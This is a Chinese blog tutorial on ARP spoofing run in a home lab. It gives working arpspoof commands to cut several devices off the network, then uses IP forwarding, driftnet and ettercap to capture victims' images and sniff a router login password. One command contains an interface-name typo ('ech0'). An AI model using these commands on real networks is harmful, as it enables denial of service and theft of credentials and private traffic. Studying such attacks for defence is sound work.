ARP欺骗的艺术 | 断网与监听

骑猪看日落 2024-04-07 12:52 17阅读 0赞

#### 0x00 免责声明 ####

本文仅限于学习讨论与技术知识的分享，不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本文作者不为此承担任何责任，一旦造成后果请自行承担！

#### 0x01 前言 ####

>  ARP 欺骗是针对以太网地址解析协议的一种攻击技术，通过欺骗局域网内访问者 PC 的网关 MAC 地址，使访问者 PC 错以为攻击者更改后的 MAC 地址是网关的 MAC ，导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包，且可让网络上特定计算机或所有计算机无法正常连线。

#### 0x02 **ARP欺骗原理** ####

ARP 协议是地址解析协议， ARP 协议的基本功能是通过目标 IP 来查询目标计算机的 MAC 地址，从而实现各个主机间流畅稳定的通信。因为早期的网络环境主机间是互相信任的。因此有人发现了 ARP 协议的设计缺陷利用 ARP 欺骗进行非法攻击。

目标主机接收到应答包之后并不会去验证是否发送过对应的请求包，却直接使用了通过 ARP 欺骗伪造的信息替换了本地 ARP 缓存表中 IP 地址与 MAC 地址的对应关系。

![c47289109c1149b8a342f7e0c09bed06.png][] ARP欺骗过程图

如果一个计算机需要和另一个计算机相互通信，那么需要相互知道互相的 MAC 地址，需要告诉对方这个数据帧的来历。然而目标 MAC 地址是通过 ARP 地址解析协议获得。 ARP 欺骗就是通过伪造 IP 地址和 MAC 地址实现的，在计算机网络中发出大量的 ARP 请求包来阻塞网络通信，出现多个 IP 地址共用一个 MAC 地址的情况。

#### 0x03 环境说明 ####

<table> 
 <tbody> 
  <tr> 
   <td style="text-align:center;"><strong>kali-linux虚拟机(192.168.1.9)</strong></td> 
  </tr> 
  <tr> 
   <td style="text-align:center;"><strong>windows 11笔记本(192.168.1.2)</strong></td> 
  </tr> 
  <tr> 
   <td style="text-align:center;"><strong>ipad mini6平板(192.168.1.8)</strong></td> 
  </tr> 
  <tr> 
   <td style="text-align:center;"><strong>redmi k40手机(192.168.1.4)</strong></td> 
  </tr> 
  <tr> 
   <td style="text-align:center;"><strong>vivo Y30手机(192.168.1.5)</strong></td> 
  </tr> 
  <tr> 
   <td style="text-align:center;"><strong>huawei 8手机(192.168.1.10)</strong></td> 
  </tr> 
 </tbody> 
</table>

####  ####

#### 0x04 准备工作 ####

文中使用 kali-linux 系统在虚拟机桥接网络的环境下进行示范。为什么不使用 NAT 模式：

>  NAT 模式下，虚拟机仅仅可以同路由器下网段中的一台真实机通讯，而这台真实机就是安装虚拟机的这台电脑，之所以可以通讯是因为这台电脑本身充当了虚拟机的路由器，采用 NAT 模式时，虚拟机和实体机交互并不是直接进行的。

**Ⅰ**查看Kali-linux虚拟机的IP地址

![c0410f7e470046d3bfc7c399f6edf170.png][]

ip addr

**Ⅱ**查看Kali-linux虚拟机的网关地址

![c11c9cad1d2e45abb89d183a63875562.png][]

route -n

#### 0x05 断网攻击 ####

**Ⅰ**使用Nmap扫描192.168.1.1/24网段上有哪些主机是存活的

![424c3cf126f446cabe88430310bfd800.png][]

nmap -sP 192.168.1.1/24

**Ⅱ**安装dsniff工具集

![0cae034170674bca9ead0b1c67402637.png][]

apt install dsniff

**Ⅲ**使用arpspoof工具分别对目标IP实施arp欺骗

![4f5f6ab0679449cfa154db03666d1efa.png][]

arpspoof -i eth0 -t 192.168.1.4 192.168.1.1    #-- -t 目标IP 目标网关 -i 网卡名 --
    arpspoof -i eth0 -t 192.168.1.2 192.168.1.1
    arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
    arpspoof -i eth0 -t 192.168.1.8 192.168.1.1
    arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

**关于可能会遇到的Error：**

***ErrorⅠ：arpspoof: libnet\_check\_iface() ioctl: No such device***

**翻译：**嗅探：libnet\_check\_iface()操作接口：没有这样的设备

**问题原因：**网卡名称错误

**解决方法：**使用 ip addr 或 ifconfig 重新检查网卡名称，一般情况下网卡名称为 eth0 。

***ErrorⅡ：arpspoof: couldn’t arp for host 192.168.1.X***

**翻译：**嗅探：无法对主机 192.168.1.X 进行 arp 欺骗

**问题原因：1.IP无法互通**

**2.IP不在同一网段**

**3.IP地址错误**

**解决方法：**使用 ping 命令检查目标IP是否能够互通，使用 ip addr 或 ifconfig 重新检查网卡名称，重新使用 nmap 扫描端口存活主机状态。

**Ⅳ**目标IP访问百度查看状态，发现均无法访问百度页面

![d6761b6ad3a54ccc9fcca0795abfc6fc.jpeg][] **windows 11笔记本**

![cd9d64ffc2b1465fbd49fdea7450a7e4.png][] **ipad mini6平板**

<table> 
 <tbody> 
  <tr> 
   <td> 
    <div>  
     <img alt="" height="440" src="https://img-blog.csdnimg.cn/af6189e168874293868f8070ac6bb180.jpeg" width="198">  
     <strong>&nbsp;redmi k40手机</strong>   
    </div> </td> 
   <td> 
    <div>  
     <img alt="" height="440" src="https://img-blog.csdnimg.cn/529fd4fa7bdc44df8032f3f35d4b7287.jpeg" width="198">  
     <strong>vivo Y30手机</strong>   
    </div> </td> 
   <td> 
    <div>  
     <img alt="" height="440" src="https://img-blog.csdnimg.cn/472b5cf1d2bc44a192ed0dc1047bae9d.jpeg" width="220">  
     <strong>huawei 8手机</strong>   
    </div> </td> 
  </tr> 
 </tbody> 
</table>

#### 0x06 持续监听-图片截取 ####

ARP 攻击可让攻击者获取局域网上的数据包甚至可篡改数据包，那么攻击者可以通过开启端口转发，实现对目标 IP 的持续监听。

**Ⅰ**开启端口转发

![365b99f7caac46f2a3bdba4f94b6db42.png][]

echo 1 > /proc/sys/net/ipv4/ip_forward    #--开启端口转发--
    echo 0 > /proc/sys/net/ipv4/ip_forward    #--关闭端口转发--

**Ⅱ**继续使用arpspoof工具实施arp欺骗，这里需要互换目标IP与目标网关

![b0069bd144af4d0eac9731260ac42bed.png][]

arpspoof -i ech0 -t 192.168.1.1 192.168.1.4

**Ⅲ**下载driftnet工具，获取数据流中的图片

![09b97173ee1145bebd02dcd93fb7ac67.png][]

apt install driftnet

**Ⅳ**使用driftnet获取目标IP数据流中的图片并保存到源目录

![24a28ff1c8c64fa983121c048cb57361.png][]

driftnet -i eth0 -a -d /usr/local/src

**Ⅴ**使用目标IP设备访问360漏洞云，发现源目录中自动下载了360漏洞云的logo

<table> 
 <tbody> 
  <tr> 
   <td> 
    <div>  
     <img alt="" height="551" src="https://img-blog.csdnimg.cn/f58893b1023f4d0ca53b8e0e4b5b101d.jpeg" width="248">  
     <strong>redmi k40手机</strong>   
    </div> </td> 
   <td> 
    <div>  
     <img alt="" height="363" src="https://img-blog.csdnimg.cn/26e0f2e83d944fca94594869aab8a8fe.png" width="641">  
     <strong>kali-linux虚拟机</strong>   
    </div> </td> 
  </tr> 
 </tbody> 
</table>

**Ⅵ**分别对平板以及笔记本进行持续监听，这里平板模拟受害者使用微信，笔记本则播放QQ音乐

**演示环境：** ipad mini6平板

<table> 
 <tbody> 
  <tr> 
   <td> 
    <div>  
     <img alt="" height="402" src="https://img-blog.csdnimg.cn/1f1efc1ed7c2486b94f73cb3e4410200.jpeg" width="264">  
     <strong>&nbsp;ipad mini6平板</strong>   
    </div> </td> 
   <td> 
    <div>  
     <img alt="" height="404" src="https://img-blog.csdnimg.cn/14453e7ce89c4ff2887bbbb462e8d21c.jpeg" width="575">  
     <strong>kali-linux虚拟机</strong>   
    </div> </td> 
  </tr> 
 </tbody> 
</table>

**演示环境：** windows11 笔记本

<table> 
 <tbody> 
  <tr> 
   <td> 
    <div>  
     <img alt="" height="161" src="https://img-blog.csdnimg.cn/bc2885159cf94a618de7b73f9e97d7b7.png" width="300">  
     <strong>windows11 笔记本</strong>   
    </div> </td> 
   <td> 
    <div>  
     <img alt="" height="172" src="https://img-blog.csdnimg.cn/be4a792e58da4f85a4b8b639a612f267.png" width="305">  
     <strong>kali-linux虚拟机</strong>   
    </div> </td> 
  </tr> 
 </tbody> 
</table>

#### 0x07 持续监听-密码获取 ####

**Ⅰ**继续使用arpspoof工具实施arp欺骗

![a4b5b36a39104764a02460095e2169ff.png][]

arpspoof -i eth0 -t 192.168.1.2 192.168.1.1

**Ⅱ**使用ettercap工具提前对目标IP的数据进行监听

![345149cb9efd4ace8ca964becbc3a585.png][]

ettercap -Tq -i eth0

**Ⅲ**在windows11笔记本模拟登录电信智能网关

![6c4b984b8e40471e94b06e47a2924272.png][]

**Ⅳ**查看ettercap生成的结果，发现用户名和密码都被窃取

![ac1c16edfe9544adb9779e6eb421fe49.png][]

#### 0x09 总结 ####

由于作者水平有限，文中若有错误与不足欢迎留言，便于及时更正。

[c47289109c1149b8a342f7e0c09bed06.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/fb9879c789c14f27ab8a69cac80f5b8a.png
[c0410f7e470046d3bfc7c399f6edf170.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/93b41eb641df499da264dd50df9593b1.png
[c11c9cad1d2e45abb89d183a63875562.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/527017ec74ab47de867f407fbb898d10.png
[424c3cf126f446cabe88430310bfd800.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/3c6fddd7a2624d05ba279fdb943b41c7.png
[0cae034170674bca9ead0b1c67402637.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/f3e66270c4c14836873b5e265ecec43a.png
[4f5f6ab0679449cfa154db03666d1efa.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7cc56f2c4b8b4e0e99368f467f365eb4.png
[d6761b6ad3a54ccc9fcca0795abfc6fc.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/d0a25c7a06fb471aa3bac6281bb3ec32.jpeg
[cd9d64ffc2b1465fbd49fdea7450a7e4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5197c7b7bce649919e5db8803762e4ff.png
[365b99f7caac46f2a3bdba4f94b6db42.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/3b44dd66ef9143059b75179342787f17.png
[b0069bd144af4d0eac9731260ac42bed.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/0effa89d295546558f43896398200a95.png
[09b97173ee1145bebd02dcd93fb7ac67.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/11d0f66c55aa401e9b2d6f43a56d2eb7.png
[24a28ff1c8c64fa983121c048cb57361.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/72a15a0861064b8b993534eeb8223cdf.png
[a4b5b36a39104764a02460095e2169ff.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e43c78a25f8b4f8ba4a9de6965176e6e.png
[345149cb9efd4ace8ca964becbc3a585.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/bd00dcaa8dd54c50a44103c1bd2ad472.png
[6c4b984b8e40471e94b06e47a2924272.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7ce6f53f643c4a70b2ea8300e4cb097c.png
[ac1c16edfe9544adb9779e6eb421fe49.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/dd40ff9a231e41a9897d66bb217dd951.png